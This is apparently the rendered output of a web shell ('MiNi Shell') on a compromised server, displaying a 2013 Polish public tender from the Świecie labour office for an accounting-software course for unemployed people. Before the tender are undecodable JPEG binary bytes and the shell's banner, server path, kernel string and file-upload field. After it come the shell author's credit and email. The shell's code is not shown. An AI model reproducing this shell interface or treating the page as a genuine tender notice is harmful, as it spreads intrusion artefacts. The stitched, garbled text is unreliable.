JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130719/284354-N-2013.html

<p class="kh_header"><b>Świecie: usługa zorganizowania i przeprowadzenia szkolenia zawodowego Obsługa komputerowego programu księgowego. Szkolenie zorganizowane ma być wyłącznie dla grupy 5 osób bezrobotnych skierowanych przez Powiatowy Urząd Pracy w Świeciu.</b><br>
<b>Numer ogłoszenia: 284354 - 2013; data zamieszczenia: 19.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świecki - Powiatowy Urząd Pracy w Świeciu , ul. Wojska Polskiego 195a, 86-100 Świecie, woj. kujawsko-pomorskie, tel. 52 33 32 210, faks 52 33 32 253.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pup.swiecie.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa zorganizowania i przeprowadzenia szkolenia zawodowego Obsługa komputerowego programu księgowego. Szkolenie zorganizowane ma być wyłącznie dla grupy 5 osób bezrobotnych skierowanych przez Powiatowy Urząd Pracy w Świeciu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Program szkolenia
Przedmiotem zamówienia jest usługa zorganizowania i przeprowadzenia szkolenia zawodowego Obsługa komputerowego programu księgowego. Szkolenie zorganizowane ma być wyłącznie dla grupy 5 osób bezrobotnych skierowanych przez Powiatowy Urząd Pracy w Świeciu. 
a.	Nazwa szkolenia: Obsługa komputerowego programu księgowego.
b.	Zakres szkolenia
Program i ilość godzin szkolenia musi obejmować następujące zagadnienia:
- zasady rachunkowości - podstawy prawne (4 godziny zajęć teoretycznych),
- księgowanie (księgowość małych i średnich firm) z wykorzystaniem komputerowego programu księgowego SYMFONIA (4 godzin zajęć teoretycznych, 112 godzin zajęć praktycznych).
c.	Czas trwania i sposób organizacji szkolenia
Liczba godzin szkolenia: 120 godzin zajęć edukacyjnych w tym:
- 8 godzin zajęć teoretycznych,
- 112 godzin zajęć praktycznych.
W założeniach programowych przyjęto godzinę edukacyjną wynoszącą 45 minut.
Szkolenie musi być prowadzone zgodnie z przedłożonym przez Wykonawcę Planem nauczania.
Szkolenie ma odbywać się w następujących po sobie dniach od poniedziałku do piątku z wyłączeniem sobót, niedziel i świąt. Każdego dnia szkolenie ma odbywać się w przedziale czasowym między godziną 8.00 a 16.00. Liczba godzin szkolenia w ciągu jednego dnia nie może przekraczać 6 godzin edukacyjnych. 
Wskazane jest aby szkolenie obejmowało nie mniej niż 25 godzin zegarowych w tygodniu, celem intensyfikacji i przeciwdziałaniu nieuzasadnionemu wydłużaniu szkolenia. 
d.	Wyposażenie dydaktyczne (wykaz środków i materiałów dydaktycznych), które będą wykorzystane do przeprowadzenia szkolenia
Każdy uczestnik szkolenia musi otrzymać na własność materiały szkoleniowe (dydaktyczne
i piśmiennicze) minimum skrypt obejmujący zagadnienia merytoryczne programu szkolenia i długopis.
Każdy uczestnik musi otrzymać bezzwrotnie powyższe materiały szkoleniowe w pierwszym dniu szkolenia, a ich otrzymanie potwierdzi na sporządzonej przez Wykonawcę liście. 
Wykonawca do realizacji zajęć teoretycznych szkolenia będzie dysponować wyposażeniem dydaktycznym tj. urządzeniami do wizualizacji prezentowanych zagadnień szkolenia minimum rzutnikiem multimedialnym, ekranem.
Wykonawca do realizacji zajęć praktycznych szkolenia będzie dysponować wyposażeniem dydaktycznym tj. minimum 5 stanowiskami komputerowymi wyposażonymi w program komputerowy SYMFONIA umożliwiający wykonywanie operacji księgowych. Na jednego uczestnika musi przypadać jedno stanowisko komputerowe.
Wykonawca jest zobowiązany dostosować wyposażenie dydaktyczne do potrzeb szkolenia 
z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia zgodnie 
z aktualnymi obowiązującymi przepisami w tym zakresie.
e.	Przewidziane sprawdziany i egzaminy
Zamawiający nie wymaga od Wykonawcy zorganizowania sprawdzianów i egzaminów. 
2.	Kwalifikacje i doświadczenie kadry dydaktycznej dostosowane do zakresu szkolenia
	Każdy z wykładowców będzie posiadać wykształcenie wyższe w zakresie rachunkowości lub ekonomii lub finanse i rachunkowość lub wykształcenie wyższe i certyfikat księgowy. 
	Dodatkowo każdy z wykładowców posiadać będzie minimum roczne doświadczenie na stanowisku księgowej(-ego) w latach 2011-2013 lub minimum roczne doświadczenie związane z obsługą księgową w ramach prowadzenia własnej działalności gospodarczej  w latach 2011-2013.
3.	Posiadanie wiedzy i doświadczenia przez Wykonawcę
Wykonawca będzie posiadać doświadczenie w realizacji minimum jednego szkolenia grupowego z obsługi komputerowego programu księgowego SYMFONIA (lub innego programu księgowego  umożliwiającego prowadzenie księgowości małych i średnich firm) lub jednego szkolenia grupowego obejmującego zajęcia z zakresu obsługi komputerowego programu księgowego SYMFONIA (lub innego programu księgowego  umożliwiającego prowadzenie księgowości małych i średnich firm) obejmujące minimum 60 godzin zajęć edukacyjnych w okresie ostatnich trzech lat przed terminem składania ofert lub jeżeli okres prowadzenia działalności jest krótszy, w tym okresie. 
4.	Dokumenty potwierdzające ukończenie szkolenia i uzyskanie kwalifikacji 
Koniecznym jest, aby uczestnicy szkolenia po jego ukończeniu otrzymali zaświadczenia zgodne z § 75 ust 3 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów 
i warunków prowadzenia usług rynku pracy (tekst jednolity z 2010 roku Nr 177, poz. 1193 z późn. zm.) które zawiera:
- numer z rejestru,
- imię i nazwisko uczestnika szkolenia,
- PESEL uczestnika szkolenia,
- nazwie instytucji szkoleniowej przeprowadzającej szkolenie,
- formę i nazwę szkolenia,
- okres trwania szkolenia,
- miejsce i datę wydania zaświadczenia,
- tematy i wymiar godzin zajęć edukacyjnych,
- podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.
Dopuszcza się wydanie zaświadczeń zgodnie ze wzorem określonym w treści  § 18 ust 2 Rozporządzenia Ministra Edukacji Narodowej  z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych pod warunkiem dołączenia do nich suplementów zawierających:
- okres trwania szkolenia,
- tematy i wymiar godzin zajęć edukacyjnych,
- numer z rejestru zaświadczenia, do którego suplement jest dodatkiem
- podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.
5.	Miejsce szkolenia 
Świecie.
Wykonawca jest zobowiązany dostosować pomieszczenia do potrzeb szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia zgodnie z aktualnymi obowiązującymi przepisami w tym zakresie.
6.	Koszty szkolenia 
a.	Przerwa kawowa:
Wykonawca zobowiązany jest zapewnić uczestnikom szkolenia  codziennie tj. od poniedziałku do piątku włącznie w trakcie zajęć przerwę kawową. 
Na przerwie kawowej Wykonawca zapewni uczestnikom szkolenia kawę, herbatę, cukier, wodę w ilości minimum 0,5 l na osobę codziennie. 
Wykonawca zobowiązany jest ująć w Kosztach szkolenia koszty przerwy kawowej uczestników szkolenia. Ubezpieczenie:
Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, będących:
- osobami bezrobotnymi od dnia podjęcia przez nich zatrudnienia, innej pracy zarobkowej lub podjęcia działalności gospodarczej w trakcie szkolenia (art. 41 ust. 3b ustawy o promocji zatrudnienia
 i instytucjach rynku pracy Dz. U.08.69.415 z późn. zm.); 
- poszukującymi pracy, o których mowa w art. 43 ust. 1 ustawy o  promocji zatrudnienia i instytucjach rynku pracy od dnia rozpoczęcia przez nich szkolenia;
- którym nie przysługuje prawo do stypendium, zgodnie z art. 41 ust. 7 i 8 ustawy o  promocji zatrudnienia i instytucjach rynku pracy od dnia rozpoczęcia przez nich szkolenia.
Informacja o konieczności ubezpieczenia uczestnika(-ów) szkolenia zostanie przekazana Wykonawcy przez Zamawiającego pisemnie lub faxem. 
Wykonawca zobowiązany jest ująć w Kosztach szkolenia koszty ubezpieczenia dla wszystkich uczestników szkolenia. Zapłata należności za zorganizowanie szkolenia obejmie te koszty jeżeli wydatek z tego tytułu zostanie poniesiony i udokumentowany przez Wykonawcę. W przypadku nie poniesienia tych kosztów przez Wykonawcę, kwotę na fakturze lub rachunku Wykonawca pomniejszy o koszt ubezpieczenia. Jest to koszt warunkowy.
7.	W ostatnim dniu szkolenia (po zakończeniu szkolenia) Wykonawca jest zobowiązany przeprowadzić badanie ankietowe z uczestnikami szkolenia na temat oceny szkolenia (wzór Zamawiającego)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny tego warunku. Jednakże, ze względu na art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jedn. z 2008 roku Dz. U. Nr 69 poz. 415 z późn. zmian.) Zamawiający podpisze umowę  o udzielenie zamówienia publicznego jedynie z Wykonawcą, który posiada aktualny wpis  do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej. Posiadanie przez instytucje szkoleniową aktualnego wpisu do rejestru instytucji szkoleniowych Zamawiający sprawdzi w centralnym rejestrze instytucji szkoleniowych, dostępnym na stronie internetowej www.ris.praca.gov.pl.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie przez Wykonawcę warunku posiadania wiedzy i doświadczenia, jeżeli ten wykaże, że posiada doświadczenie w realizacji szkoleń o tej samej tematyce:
Wykonawca będzie posiadać doświadczenie w realizacji minimum jednego szkolenia grupowego z obsługi komputerowego programu księgowego SYMFONIA (lub innego programu księgowego  umożliwiającego prowadzenie księgowości małych i średnich firm) lub jednego szkolenia grupowego obejmującego zajęcia z zakresu obsługi komputerowego programu księgowego SYMFONIA (lub innego programu księgowego  umożliwiającego prowadzenie księgowości małych i średnich firm) obejmujące minimum 60 godzin zajęć edukacyjnych w okresie ostatnich trzech lat przed terminem składania ofert lub jeżeli okres prowadzenia działalności jest krótszy, w tym okresie. 
W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w niniejszej SIWZ. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie przez Wykonawcę tego warunku jeżeli ten wykaże, że:
- będzie dysponował potencjałem technicznym niezbędnym do prawidłowego wykonania przedmiotu zamówienia, tj.: minimum jednym rzutnikiem multimedialnym, ekranem oraz 5 stanowiskami komputerowymi wyposażonymi w program komputerowy SYMFONIA umożliwiający wykonywanie operacji księgowych.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w niniejszej SIWZ. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie przez Wykonawcę tego warunku jeżeli ten wykaże, że:
będzie dysponował odpowiednim potencjałem kadrowym - osobami zdolnymi do prawidłowego wykonania zamówienia, tj.: każdy z wykładowców będzie posiadać wykształcenie wyższe w zakresie rachunkowości lub ekonomii lub finanse i rachunkowość lub wykształcenie wyższe i certyfikat księgowy. Dodatkowo każdy z wykładowców  posiadać będzie minimum roczne doświadczenie na stanowisku księgowej(-ego) w latach 2011-2013 lub minimum roczne doświadczenie związane z obsługą księgową w ramach prowadzenia własnej działalności gospodarczej  w latach 2011-2013.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia/nie spełnia na podstawie przedłożonych oświadczeń, dokumentów i informacji wyszczególnionych w niniejszej SIWZ. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny warunku znajdowania się 
w odpowiedniej sytuacji ekonomicznej i finansowej i wymaga od Wykonawcy złożenia oświadczenia o spełnianiu tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Podpisanego i wypełnionego formularza oferty.
2. Pełnomocnictwa - w przypadku podpisywania oferty lub innych dokumentów załączonych do oferty przez pełnomocnika, to Wykonawca ma obowiązek dołączyć do oferty oryginał lub kserokopię potwierdzoną za zgodność z oryginałem przez osoby do tego upoważnione stosownego pełnomocnictwa.
3. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa może ulec zmianie w wyniku zmiany ilości osób pierwotnie skierowanych na szkolenie. W takiej sytuacji Zamawiający zastrzega sobie prawo do skierowania kolejnego uczestnika z listy rezerwowej w ciągu pierwszych 24 godzin realizacji zajęć w miejsce osoby, która przerwała szkolenie lub w przypadku nieobecności uczestnika szkolenia trwającej 24 godziny i powyżej spowodowanej niezdolnością do pracy potwierdzonej zaświadczeniem na druku ZUS ZLA. 
Zmniejszenie liczby uczestników może nastąpić w szczególności:
a.	niepodjęcia szkolenia przez uczestnika(-ów) szkolenia powyżej pierwszych 24 godzin szkolenia,
b.	nieusprawiedliwionych nieobecności uczestnika(-ów) na szkoleniu powyżej pierwszych 24 godzin szkolenia.
2. Umowa może ulec zmianie w wyniku następujących okoliczności ze strony Wykonawcy: 
a.	zmiana kadry realizującej szkolenie w wyniku zdarzeń: choroby wykładowcy potwierdzonej zaświadczeniem na druku ZUS ZLA, śmierci wykładowcy, rozwiązania umowy o pracę lub umowy cywilnoprawnej ze strony wykładowcy, rozwiązania umowy o pracę przez Wykonawcę w trybie art. 52 KP, których nie można było przewidzieć w dniu zawarcia umowy. W takiej sytuacji Wykonawca jest zobowiązany do pisemnego przedstawienia Zamawiającemu do akceptacji nowego Planu nauczania uwzględniającego zmiany wykładowcy niezwłocznie ale nie później niż w terminie 5 dni roboczych od ich zaistnienia. Przy czym kwalifikacje kadry muszą być takie same lub wyższe od deklarowanego w ofercie, 
b.	zmiana siedziby Wykonawcy. W takiej sytuacji Wykonawca zobowiązany jest do pisemnego poinformowania Zamawiającego i przedstawienia nowego adresu niezwłocznie ale nie później niż w terminie 5 dni roboczych, 
c.	 zmiana miejsc prowadzenia szkolenia w wyniku awarii uniemożliwiającej prowadzenie zajęć. W takiej sytuacji Wykonawca jest zobowiązany do pisemnego przedstawienia Zamawiającemu do akceptacji nowego adresu prowadzenia szkolenia niezwłocznie jednak nie później niż w terminie 5 dni roboczych od zaistnienia tej zmiany. Przy czym warunki lokalowe muszą być takie same lub wyższe od deklarowanych w ofercie.
3. Zmiany do umowy zostaną wprowadzane przez zawarcie aneksu pisemnego pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pup.swiecie.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Świeciu ul. Wojska Polskiego 195 a, 86-100 Świecie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2013 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Świeciu ul. Wojska Polskiego 195 a, 86-100 Świecie pokój nr 11- sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com